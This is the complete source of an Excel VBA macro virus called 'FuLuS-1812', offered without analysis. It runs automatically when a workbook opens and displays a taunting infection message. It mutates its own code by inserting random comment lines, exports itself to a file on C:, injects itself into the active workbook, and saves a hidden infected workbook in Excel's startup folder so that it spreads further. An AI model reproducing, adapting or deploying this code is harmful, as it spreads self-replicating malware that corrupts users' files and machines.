Attribute VB_Name = "FuLuS-1812" 
rem FSUJWISJXDdpPoI
Sub Auto_Open()
rem kjsHNBVC
Randomize
If Int((Rnd*9) + 1) <> 5 Then
Rem AfJYuUKkuUuUKuyuyUIuUiuIyYUuyIYKUGKUGLIY
MsgBox "FuLuS-1812 virus exist on your Computer,go clean it now..!!", vbOkOnly, "FuLuS-1812 By Psychologic"
End If
Application.OnSheetActivate = "Fulus"
Rem UhUyHyTgFrTyJMj
End Sub
Sub Fulus()
rem uIyYUuyIYKUGKUGkjsHNBVC
On Error Resume Next
FuLuS1 = "FuLuS-1812":FuLuS2 = "FuLuz.xLs"
Rem AfJYuUKkuUuUKuyuyUIuUiuI
FuLuS3 = Application.StartupPath & "\" & FuLuS2
FuLuS4 = 0:FuLuS5 = 0
Randomize
rem uUuUKuyuyUIu
aCtLine = Application.VBE.ActiveVBProject.VBComponents("FuLuS-1812").CodeModule.CountOfLines
If aCtLine > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("FuLuS-1812").CodeModule
For i = 1 To .CountOfLines
Rem A
If Left(.Lines(i, 1), 3) = lcase("Rem") Then .DeleteLines i
Next i
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("FuLuS-1812").CodeModule
PoLyViR = Int(Rnd * 10)
For f = 1 To PoLyViR
PoLyStR = "
LiNePoLy = .CountOfLines
Rem bhsytU
RndLine = Int(Rnd * LiNePoLy) + 1
StringSize = Int(Rnd * 39) + 1
Rem qtrmjIiiosaIBVNCX
For SomeString = 1 To StringSize
PoLyStR = PoLyStR & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Rem nvDcGjYdJsASRpoeiUJD
Next SomeString
.InsertLines RndLine, "ReM " & PoLyStR
Next f
End With
End If
Rem UhUyHyTgFrTyJMj
Application.VBE.ActiveVBProject.VBComponents.Item(FuLuS1).Export "C:\FuLuS-1812.ini"
If Dir(FuLuS3) = FuLuS2 Then FuLuS5 = 1
For x = 1 to ActiveWorkbook.VBProject.VBComponents.Count
Rem iweoHHtFDDrKl
If ActiveWorkbook.VBProject.VBComponents(x).Name = FuLuS1 Then FuLuS4 = 1
Next x
If FuLuS4 = 0 Then
ActiveWorkbook.VBProject.VBComponents.Import "C:\FuLuS-1812.ini"
ActiveWorkbook.Save
End If
If FuLuS5 = 0 Then
Workbooks.Add.SaveAs FileName:=FuLuS3
Rem AfJY
ActiveWorkbook.VBProject.VBComponents.Import "C:\FuLuS-1812.ini"
ActiveWindow.Visible = False
Rem csvsfteioOISgTggstwe
Workbooks(FuLuS2).Save
End If
End Sub